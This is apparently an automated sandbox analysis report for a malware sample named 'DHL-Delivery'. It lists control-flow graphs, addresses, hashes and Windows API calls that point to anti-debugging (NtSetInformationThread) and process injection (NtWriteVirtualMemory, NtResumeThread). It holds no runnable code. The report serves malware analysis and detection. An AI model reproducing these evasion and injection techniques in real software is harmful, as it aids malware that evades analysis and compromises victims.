                        control_flow_graph 1051 21aab3f-21aab8c 1054 21aab8d-21aac45 1051->1054 1060 21aac4b-21aae07 call 21a9344 1054->1060 1076 21aae09-21aae55 1060->1076 1079 21aae57-21aafc5 1076->1079 1090 21aafc7-21ab016 1079->1090 1093 21ab018-21ab12a 1090->1093 1103 21ab35c-21ab389 1093->1103 1104 21ab130-21ab1a6 1093->1104 1108 21ab38b 1103->1108 1104->1103 1110 21ab1ac-21ab1b2 1104->1110 1108->1108 1110->1103 1111 21ab1b8-21ab1dc 1110->1111 1111->1103 1113 21ab1e2-21ab1e8 1111->1113 1113->1103 1114 21ab1ee-21ab1f3 1113->1114 1114->1103 1115 21ab1f9-21ab21e 1114->1115 1115->1103 1117 21ab224-21ab25f 1115->1117 1119 21a83ac-21a83e1 1117->1119 1120 21ab265-21ab269 1117->1120 1123 21a84db-21a851c LoadLibraryA call 21a854d 1119->1123 1124 21a83e7-21a8420 call 21a8b71 1119->1124 1120->1103 1122 21ab26f-21ab27b 1120->1122 1122->1103 1125 21ab281-21ab2b0 1122->1125 1135 21a8422-21a842e 1124->1135 1136 21a8490-21a84d4 call 21a854d 1124->1136 1125->1103 1130 21ab2b6-21ab2c3 1125->1130 1130->1119 1134 21ab2c9-21ab30a NtResumeThread 1130->1134 1134->1119 1140 21ab310 1134->1140 1138 21a0928-21a0940 1135->1138 1139 21a8434-21a8449 call 21a8b71 1135->1139 1136->1138 1153 21a84da 1136->1153 1138->1138 1144 21a0942-21a0991 call 21a83ac call 21a4d72 1138->1144 1139->1136 1150 21a844b-21a8487 call 21a8b71 1139->1150 1143 21ab311-21ab31d 1140->1143 1143->1143 1147 21ab31f-21ab340 1143->1147 1144->1138 1162 21a0993-21a09cc 1144->1162 1157 21ab346 1147->1157 1150->1138 1161 21a848d-21a848e 1150->1161 1153->1123 1157->1157 1161->1136 1162->1138 1164 21a09d2-21a0a3c call 21a9afd 1162->1164 1164->1138 1168 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1164->1168 1168->1138 1179 21a0b3c 1168->1179 1180 21a0b3d-21a0bc1 call 21a8844 1179->1180 1185 21a0bc7-21a660e call 21a0c05 1180->1185 1190 21a6679-21a66ac call 21a07c6 1185->1190 1191 21a6610-21a6677 call 21a0712 call 21a634e 1185->1191 1200 21a66af-21a66e1 call 21a0536 1190->1200 1201 21a66e2 1190->1201 1191->1190 1191->1201 1200->1201 1204 21a6748-21a6760 1201->1204 1205 21a66e4-21a6745 call 21a4ac4 1201->1205 1207 21a6763-21a67d0 call 21a55cd call 21a4c0a 1204->1207 1205->1207
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 1876017897-1346282702
                        • Opcode ID: 550fac49bd80446cc8e972711a445b9590d39b4880e671c54bbbb90dabc65362
                        • Instruction ID: 541fdd7bc1af3d151948ca54c5f9322f502bb6dcec2d612b06892eb3893c3763
                        • Opcode Fuzzy Hash: 550fac49bd80446cc8e972711a445b9590d39b4880e671c54bbbb90dabc65362
                        • Instruction Fuzzy Hash: 8CF1EF2C6C93469EEF39597489B43FA23A39F16764FDA416BCCA387081D366C485C643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A2921, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1025nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1221 21a2921-21a2935 1222 21a2940-21a29f8 1221->1222 1223 21a293b call 21a83ac 1221->1223 1227 21a29fe-21a2a8f call 21a81f2 * 2 1222->1227 1228 21a83ac-21a83e1 1222->1228 1223->1222 1227->1228 1248 21a2a95-21a2adc 1227->1248 1231 21a84db-21a851c LoadLibraryA call 21a854d 1228->1231 1232 21a83e7-21a8420 call 21a8b71 1228->1232 1243 21a8422-21a842e 1232->1243 1244 21a8490-21a84d4 call 21a854d 1232->1244 1246 21a0928-21a0940 1243->1246 1247 21a8434-21a8449 call 21a8b71 1243->1247 1244->1246 1261 21a84da 1244->1261 1246->1246 1252 21a0942-21a0991 call 21a83ac call 21a4d72 1246->1252 1247->1244 1258 21a844b-21a8487 call 21a8b71 1247->1258 1248->1246 1255 21a2ae2-21a2b99 1248->1255 1252->1246 1276 21a0993-21a09cc 1252->1276 1266 21a2b9f-21a2be0 1255->1266 1267 21a087d-21a0901 call 21a07ff 1255->1267 1258->1246 1273 21a848d-21a848e 1258->1273 1261->1231 1266->1228 1275 21a2be6-21a2c2b 1266->1275 1273->1244 1281 21a2c2d-21a2cab call 21a81f2 1275->1281 1276->1246 1282 21a09d2-21a0a3c call 21a9afd 1276->1282 1291 21a2cad-21a2cfe 1281->1291 1282->1246 1290 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1282->1290 1290->1246 1312 21a0b3c 1290->1312 1297 21a2d00-21a2d94 call 21aab16 1291->1297 1307 21a2d9a-21a2dd6 1297->1307 1311 21a2ddc-21a2dea 1307->1311 1311->1311 1313 21a2dec-21a2e3a 1311->1313 1314 21a0b3d-21a0bc1 call 21a8844 1312->1314 1319 21a2e3d-21a2e98 call 21a81f2 1313->1319 1324 21a0bc7-21a0bfa 1314->1324 1327 21a2e9a-21a2f2e call 21a81f2 1319->1327 1328 21a6608-21a660e call 21a0c05 1324->1328 1343 21a3247-21a3326 call 21a3bf2 GetPEB 1327->1343 1344 21a2f34-21a2f58 1327->1344 1334 21a6679-21a66ac call 21a07c6 1328->1334 1335 21a6610-21a6677 call 21a0712 call 21a634e 1328->1335 1350 21a66af-21a66e1 call 21a0536 1334->1350 1351 21a66e2 1334->1351 1335->1334 1335->1351 1377 21a332c-21a3355 1343->1377 1378 21a3594-21a359f 1343->1378 1353 21a2f5a-21a2ffd call 21a81f2 1344->1353 1350->1351 1357 21a6748-21a6760 1351->1357 1358 21a66e4-21a6745 call 21a4ac4 1351->1358 1387 21a3003-21a3038 1353->1387 1388 21a3224-21a3244 1353->1388 1362 21a6763-21a67d0 call 21a55cd call 21a4c0a 1357->1362 1358->1362 1377->1267 1390 21a335b-21a3395 1377->1390 1380 21a35d1-21ab3a9 call 21a3612 1378->1380 1381 21a35a1-21a35cb call 21a3a67 1378->1381 1417 21ab3ae 1380->1417 1381->1380 1399 21a303a-21a3044 1387->1399 1400 21a3054-21a3080 1387->1400 1388->1343 1402 21a3398-21a33ec 1390->1402 1399->1228 1403 21a304a-21a3051 1399->1403 1407 21a3081-21a309a 1400->1407 1412 21a4cf9-21a4d1f 1402->1412 1413 21a33f2-21a34bb call 21a3d91 call 21aab16 1402->1413 1403->1400 1410 21a320a-21a321a 1407->1410 1411 21a30a0-21a30c6 1407->1411 1410->1353 1410->1388 1420 21a30c8-21a30cd 1411->1420 1421 21a30d4-21a314b call 21a87d8 1411->1421 1419 21a4d20-21a4d5c 1412->1419 1413->1402 1440 21a34c1-21a358f call 21aab16 1413->1440 1417->1417 1427 21a4d5e-21a4d67 1419->1427 1425 21a3161-21a31dc call 21a87d8 1420->1425 1421->1425 1438 21a31e1-21a31e9 1421->1438 1425->1438 1427->1328 1438->1407 1440->1378
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 2c19c2a2abcaab1d07352d9948f70eb66a3423691e8e714f4ffc6e632fe3add6
                        • Instruction ID: f650c45c7da5eef756f59b6588570e092a79eeb9a3802bf82ffdea76f6ec2f16
                        • Opcode Fuzzy Hash: 2c19c2a2abcaab1d07352d9948f70eb66a3423691e8e714f4ffc6e632fe3add6
                        • Instruction Fuzzy Hash: E652E079BC43179FEB249D288DB07D673A7BF16360F954229DCA683181D735C88AC742
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A5862, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 509nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1447 21a5862-21a58d6 1451 21a5d1c-21a5d4b 1447->1451 1452 21a58dc-21a58f4 1447->1452 1461 21a6608-21a660e call 21a0c05 1451->1461 1453 21a58fa-21a59c4 call 21aab16 call 21a599d 1452->1453 1454 21a0928-21a0940 1452->1454 1453->1451 1483 21a59ca-21a5a79 1453->1483 1454->1454 1456 21a0942-21a0991 call 21a83ac call 21a4d72 1454->1456 1456->1454 1476 21a0993-21a09cc 1456->1476 1470 21a6679-21a66ac call 21a07c6 1461->1470 1471 21a6610-21a6677 call 21a0712 call 21a634e 1461->1471 1491 21a66af-21a66e1 call 21a0536 1470->1491 1492 21a66e2 1470->1492 1471->1470 1471->1492 1476->1454 1485 21a09d2-21a0a3c call 21a9afd 1476->1485 1483->1451 1513 21a5a7f-21a5ae9 1483->1513 1485->1454 1500 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1485->1500 1491->1492 1497 21a6748-21a6760 1492->1497 1498 21a66e4-21a6745 call 21a4ac4 1492->1498 1502 21a6763-21a67d0 call 21a55cd call 21a4c0a 1497->1502 1498->1502 1500->1454 1538 21a0b3c 1500->1538 1522 21a5aec-21a5b7c call 21a5b10 1513->1522 1536 21a5bae-21a5bfa call 21aab16 1522->1536 1537 21a5b7e-21a5ba8 1522->1537 1536->1451 1547 21a5c00-21a5c0c 1536->1547 1537->1536 1541 21a0b3d-21a0bb8 call 21a8844 1538->1541 1548 21a0bbd-21a0bc1 1541->1548 1549 21a087d-21a0901 call 21a07ff 1547->1549 1550 21a5c12-21a5c23 1547->1550 1548->1541 1553 21a0bc7-21a0bfa 1548->1553 1551 21a5c5d-21a5d13 call 21aab16 * 2 1550->1551 1552 21a5c25-21a5c53 1550->1552 1552->1522 1553->1461
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: -+BC$1.!T$ntdll
                        • API String ID: 4046476035-1050246477
                        • Opcode ID: a1d9a9b305ae8ba232114e04648e1c10266d8483a7a79536c1281402c60c1064
                        • Instruction ID: 946c1239a8a0b268c7f54cfd8562f931a4bb17748066e7036215e87608f1458d
                        • Opcode Fuzzy Hash: a1d9a9b305ae8ba232114e04648e1c10266d8483a7a79536c1281402c60c1064
                        • Instruction Fuzzy Hash: 4FE11D78BC834BAEEB319D348DB57EA37A7AF12390FC44129DC468B081E376C449C652
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A90C3, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 459librarynativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1567 21a90c3-21a90eb 1569 21a83ac-21a83e1 1567->1569 1570 21a90f1-21a91c5 1567->1570 1573 21a84db-21a851c LoadLibraryA call 21a854d 1569->1573 1574 21a83e7-21a8420 call 21a8b71 1569->1574 1588 21a0928-21a0940 1570->1588 1590 21a91cb-21a9340 1570->1590 1585 21a8422-21a842e 1574->1585 1586 21a8490-21a84d4 call 21a854d 1574->1586 1585->1588 1589 21a8434-21a8449 call 21a8b71 1585->1589 1586->1588 1603 21a84da 1586->1603 1588->1588 1594 21a0942-21a0991 call 21a83ac call 21a4d72 1588->1594 1589->1586 1600 21a844b-21a8487 call 21a8b71 1589->1600 1594->1588 1615 21a0993-21a09cc 1594->1615 1600->1588 1614 21a848d-21a848e 1600->1614 1603->1573 1614->1586 1615->1588 1618 21a09d2-21a0a3c call 21a9afd 1615->1618 1618->1588 1622 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1618->1622 1622->1588 1633 21a0b3c 1622->1633 1634 21a0b3d-21a0bc1 call 21a8844 1633->1634 1639 21a0bc7-21a660e call 21a0c05 1634->1639 1644 21a6679-21a66ac call 21a07c6 1639->1644 1645 21a6610-21a6677 call 21a0712 call 21a634e 1639->1645 1654 21a66af-21a66e1 call 21a0536 1644->1654 1655 21a66e2 1644->1655 1645->1644 1645->1655 1654->1655 1658 21a6748-21a6760 1655->1658 1659 21a66e4-21a6745 call 21a4ac4 1655->1659 1661 21a6763-21a67d0 call 21a55cd call 21a4c0a 1658->1661 1659->1661
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 9b692f5d9082abccd69b293d73f84b31e400494cc1b01f937345093b110dc8c5
                        • Instruction ID: 44e742ed5b349c3339dd6b1dfe262a295134d14242795f57191764109082e9fc
                        • Opcode Fuzzy Hash: 9b692f5d9082abccd69b293d73f84b31e400494cc1b01f937345093b110dc8c5
                        • Instruction Fuzzy Hash: 40C11D6CBC63575EEF21687849B53EA23978F127A0FD9417ADC8383082E766C48AC543
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A1E31, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 419UNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1675 21a1e31-21a1e33 1676 21a1e35-21a1e70 1675->1676 1678 21a1ed8-21a1ee1 1676->1678 1679 21a1e72-21a1ea4 1676->1679 1680 21a83ac-21a83e1 1678->1680 1681 21a1ee7-21a1ef8 1678->1681 1679->1676 1686 21a1ea6-21a1eb2 1679->1686 1689 21a84db-21a851c LoadLibraryA call 21a854d 1680->1689 1690 21a83e7-21a8420 call 21a8b71 1680->1690 1683 21a0928-21a0940 1681->1683 1684 21a1efe-21a1f09 1681->1684 1683->1683 1688 21a0942-21a0991 call 21a83ac call 21a4d72 1683->1688 1687 21a6608-21a660e call 21a0c05 1684->1687 1701 21a6679-21a66ac call 21a07c6 1687->1701 1702 21a6610-21a6677 call 21a0712 call 21a634e 1687->1702 1688->1683 1718 21a0993-21a09cc 1688->1718 1704 21a8422-21a842e 1690->1704 1705 21a8490-21a84d4 call 21a854d 1690->1705 1724 21a66af-21a66e1 call 21a0536 1701->1724 1725 21a66e2 1701->1725 1702->1701 1702->1725 1704->1683 1709 21a8434-21a8449 call 21a8b71 1704->1709 1705->1683 1728 21a84da 1705->1728 1709->1705 1726 21a844b-21a8487 call 21a8b71 1709->1726 1718->1683 1729 21a09d2-21a0a3c call 21a9afd 1718->1729 1724->1725 1732 21a6748-21a6760 1725->1732 1733 21a66e4-21a6745 call 21a4ac4 1725->1733 1726->1683 1747 21a848d-21a848e 1726->1747 1728->1689 1729->1683 1745 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1729->1745 1738 21a6763-21a67d0 call 21a55cd call 21a4c0a 1732->1738 1733->1738 1745->1683 1766 21a0b3c 1745->1766 1747->1705 1767 21a0b3d-21a0bc1 call 21a8844 1766->1767 1772 21a0bc7-21a0bfa 1767->1772 1772->1687
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1.!T$ntdll
                        • API String ID: 0-1346282702
                        • Opcode ID: fabb34166a68f042159e9a03ea72993303a4350e57e7d144a7be8d9bb36f3c1e
                        • Instruction ID: 70aa0f1b8c4e2f05351aaeacc2bc6ac6c2923b6a81b0380e8947845f8ba94f23
                        • Opcode Fuzzy Hash: fabb34166a68f042159e9a03ea72993303a4350e57e7d144a7be8d9bb36f3c1e
                        • Instruction Fuzzy Hash: 96C10C7CAC63575EEF2169788CB53EA37A79F02760FD5406ADC82C7182E3A5C44AC643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A07FF, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 341nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1774 21a07ff-21a083b EnumWindows 1776 21a0928-21a0940 1774->1776 1777 21a0841-21a0901 call 21a07ff 1774->1777 1776->1776 1779 21a0942-21a0991 call 21a83ac call 21a4d72 1776->1779 1779->1776 1790 21a0993-21a09cc 1779->1790 1790->1776 1793 21a09d2-21a0a3c call 21a9afd 1790->1793 1793->1776 1797 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 1793->1797 1797->1776 1808 21a0b3c 1797->1808 1809 21a0b3d-21a0bc1 call 21a8844 1808->1809 1814 21a0bc7-21a660e call 21a0c05 1809->1814 1819 21a6679-21a66ac call 21a07c6 1814->1819 1820 21a6610-21a6677 call 21a0712 call 21a634e 1814->1820 1829 21a66af-21a66e1 call 21a0536 1819->1829 1830 21a66e2 1819->1830 1820->1819 1820->1830 1829->1830 1833 21a6748-21a6760 1830->1833 1834 21a66e4-21a6745 call 21a4ac4 1830->1834 1836 21a6763-21a67d0 call 21a55cd call 21a4c0a 1833->1836 1834->1836
                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumInformationThreadWindows
                        • String ID: 1.!T$ntdll
                        • API String ID: 1954852945-1346282702
                        • Opcode ID: 3e50a86c3d308bf16ab60c32165385e318a45d1fb95cbf7a2fc11b2c4236fe54
                        • Instruction ID: 823feddd994be8781a05da40a1a6d2a27043d7151e32ffa03fdf7764512a5075
                        • Opcode Fuzzy Hash: 3e50a86c3d308bf16ab60c32165385e318a45d1fb95cbf7a2fc11b2c4236fe54
                        • Instruction Fuzzy Hash: FCA13D3CAC53674EEB1199748CB23DA37939F17360F9941A9DC82C7182D76AC44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A56E1, Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 758libraryUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1850 21a56e1-21a5814 call 21a83ac * 5 1865 21a581a-21a6512 call 21a5862 1850->1865 1866 21a087d-21a0901 call 21a07ff 1850->1866 1876 21a6543-21a6572 call 21a56e1 1865->1876 1877 21a6514-21a6542 1865->1877 1881 21a65dd-21a6601 1876->1881 1882 21a6574-21a65b0 LdrInitializeThunk 1876->1882 1877->1876 1883 21a4020-21a4175 call 21a9afd call 21a8334 call 21aab16 1881->1883 1884 21a6607 1881->1884 1924 21a417b-21a4218 call 21a83ac call 21aab16 1883->1924 1925 21a498f-21a4a5f call 21aab16 * 3 1883->1925 1886 21a6608-21a660e call 21a0c05 1884->1886 1892 21a6679-21a66ac call 21a07c6 1886->1892 1893 21a6610-21a6677 call 21a0712 call 21a634e 1886->1893 1906 21a66af-21a66e1 call 21a0536 1892->1906 1907 21a66e2 1892->1907 1893->1892 1893->1907 1906->1907 1911 21a6748-21a6760 1907->1911 1912 21a66e4-21a6745 call 21a4ac4 1907->1912 1915 21a6763-21a67d0 call 21a55cd call 21a4c0a 1911->1915 1912->1915 1945 21a421e-21a4388 call 21a4a9b call 21a80e6 1924->1945 1946 21a83ac-21a83e1 1924->1946 1925->1883 1965 21a4a65-21a4a91 1925->1965 1988 21a4cf9-21a4d1f 1945->1988 1989 21a438e-21a4454 call 21aab16 1945->1989 1952 21a84db-21a84e7 LoadLibraryA call 21a854d 1946->1952 1953 21a83e7-21a8420 call 21a8b71 1946->1953 1958 21a84ec-21a851c 1952->1958 1966 21a8422-21a842e 1953->1966 1967 21a8490-21a84d4 call 21a854d 1953->1967 1970 21a0928-21a0940 1966->1970 1971 21a8434-21a8449 call 21a8b71 1966->1971 1967->1970 1985 21a84da 1967->1985 1970->1970 1975 21a0942-21a0991 call 21a83ac call 21a4d72 1970->1975 1971->1967 1982 21a844b-21a8487 call 21a8b71 1971->1982 1975->1970 2000 21a0993-21a09cc 1975->2000 1982->1970 1998 21a848d-21a848e 1982->1998 1985->1952 1995 21a4d20-21a4d5c 1988->1995 1989->1925 2008 21a445a-21a44f1 call 21aab16 1989->2008 2002 21a4d5e-21a4d67 1995->2002 1998->1967 2000->1970 2005 21a09d2-21a0a3c call 21a9afd 2000->2005 2002->1886 2005->1970 2013 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 2005->2013 2008->1925 2018 21a44f7-21a45db call 21aab16 2008->2018 2013->1970 2035 21a0b3c 2013->2035 2018->1925 2030 21a45e1-21a460b 2018->2030 2030->1925 2034 21a4611-21a461c 2030->2034 2036 21a4649-21a4656 2034->2036 2037 21a461e-21a4623 2034->2037 2039 21a0b3d-21a0bb8 call 21a8844 2035->2039 2036->1925 2038 21a465c-21a46bb 2036->2038 2037->1925 2040 21a4629-21a4647 2037->2040 2038->1866 2047 21a46c1-21a4754 call 21a8844 2038->2047 2048 21a0bbd-21a0bc1 2039->2048 2040->2036 2047->1925 2056 21a475a-21a47e4 call 21a4cf9 2047->2056 2048->2039 2050 21a0bc7-21a0bfa 2048->2050 2050->1886 2056->1866 2061 21a47ea-21a482f NtWriteVirtualMemory 2056->2061 2061->1925 2063 21a4835-21a48b4 call 21aab16 2061->2063 2063->1925 2068 21a48ba-21a4936 call 21aab16 2063->2068 2068->1925 2073 21a4938-21a498a call 21aab16 2068->2073
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID: ntdll
                        • API String ID: 3353482560-3337577438
                        • Opcode ID: 9e59f69d005c88b24fc4f86477335ac156e03bd598e9c3d21ce69973796808ea
                        • Instruction ID: 059eb32fc9e8019551231b2fc664d5807b289c7ec8cfc2ce177f311a2056c230
                        • Opcode Fuzzy Hash: 9e59f69d005c88b24fc4f86477335ac156e03bd598e9c3d21ce69973796808ea
                        • Instruction Fuzzy Hash: D832CB387C53879EEB209E788CB17E537A7AF12780FD94119DD82871C5C7BA848AC752
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A253A, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 431nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2078 21a253a-21a2540 2079 21a4cf9-21a4d1f 2078->2079 2080 21a2546-21a2583 2078->2080 2083 21a4d20-21a4d5c 2079->2083 2084 21a0928-21a0940 2080->2084 2085 21a2589-21a2593 call 21a7654 2080->2085 2091 21a4d5e-21a4d67 2083->2091 2084->2084 2086 21a0942-21a0991 call 21a83ac call 21a4d72 2084->2086 2085->2079 2092 21a696f-21a6a20 call 21a259b call 21a22fa call 21a232d call 21a62ba 2085->2092 2086->2084 2107 21a0993-21a09cc 2086->2107 2094 21a6608-21a660e call 21a0c05 2091->2094 2163 21a6a8a 2092->2163 2164 21a6a22-21a6a88 call 21a55bd 2092->2164 2101 21a6679-21a66ac call 21a07c6 2094->2101 2102 21a6610-21a6677 call 21a0712 call 21a634e 2094->2102 2122 21a66af-21a66e1 call 21a0536 2101->2122 2123 21a66e2 2101->2123 2102->2101 2102->2123 2107->2084 2115 21a09d2-21a0a3c call 21a9afd 2107->2115 2115->2084 2131 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 2115->2131 2122->2123 2128 21a6748-21a6760 2123->2128 2129 21a66e4-21a6745 call 21a4ac4 2123->2129 2133 21a6763-21a67d0 call 21a55cd call 21a4c0a 2128->2133 2129->2133 2131->2084 2169 21a0b3c 2131->2169 2166 21a6a8d-21a6a95 2163->2166 2164->2166 2171 21a0b3d-21a0bc1 call 21a8844 2169->2171 2177 21a0bc7-21a0bfa 2171->2177 2177->2094
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 20feef2997f90c6870751af68dffee7f3ee6281b5a4a34fefc3e8aff7e8ff326
                        • Instruction ID: dbdaf63d0e8739a683ba123b5a6db38e9a37990079734e3976cfcc37a623c73c
                        • Opcode Fuzzy Hash: 20feef2997f90c6870751af68dffee7f3ee6281b5a4a34fefc3e8aff7e8ff326
                        • Instruction Fuzzy Hash: 42C1FF7DACA3A74FEB1299744CB53D537A39F23710F9941AADC42CB182D366C40AC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A8B71, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 348nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5570 21a8b71-21a8bb4 GetPEB 5572 21a8bba-21a8bbb 5570->5572 5573 21a0928-21a0940 5570->5573 5575 21a8bcf-21a8bf9 5572->5575 5573->5573 5574 21a0942-21a0991 call 21a83ac call 21a4d72 5573->5574 5574->5573 5590 21a0993-21a09cc 5574->5590 5578 21a8bfb-21a8c0c call 21a8c8a 5575->5578 5579 21a8c40-21a8c47 5575->5579 5585 21a8c0e-21a8c37 5578->5585 5586 21a8bc2-21a8bcb 5578->5586 5586->5579 5589 21a8bcd 5586->5589 5589->5575 5590->5573 5592 21a09d2-21a0a3c call 21a9afd 5590->5592 5592->5573 5596 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 5592->5596 5596->5573 5607 21a0b3c 5596->5607 5608 21a0b3d-21a0bb8 call 21a8844 5607->5608 5612 21a0bbd-21a0bc1 5608->5612 5612->5608 5613 21a0bc7-21a660e call 21a0c05 5612->5613 5618 21a6679-21a66ac call 21a07c6 5613->5618 5619 21a6610-21a6677 call 21a0712 call 21a634e 5613->5619 5628 21a66af-21a66e1 call 21a0536 5618->5628 5629 21a66e2 5618->5629 5619->5618 5619->5629 5628->5629 5632 21a6748-21a6760 5629->5632 5633 21a66e4-21a6745 call 21a4ac4 5629->5633 5635 21a6763-21a67d0 call 21a55cd call 21a4c0a 5632->5635 5633->5635
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
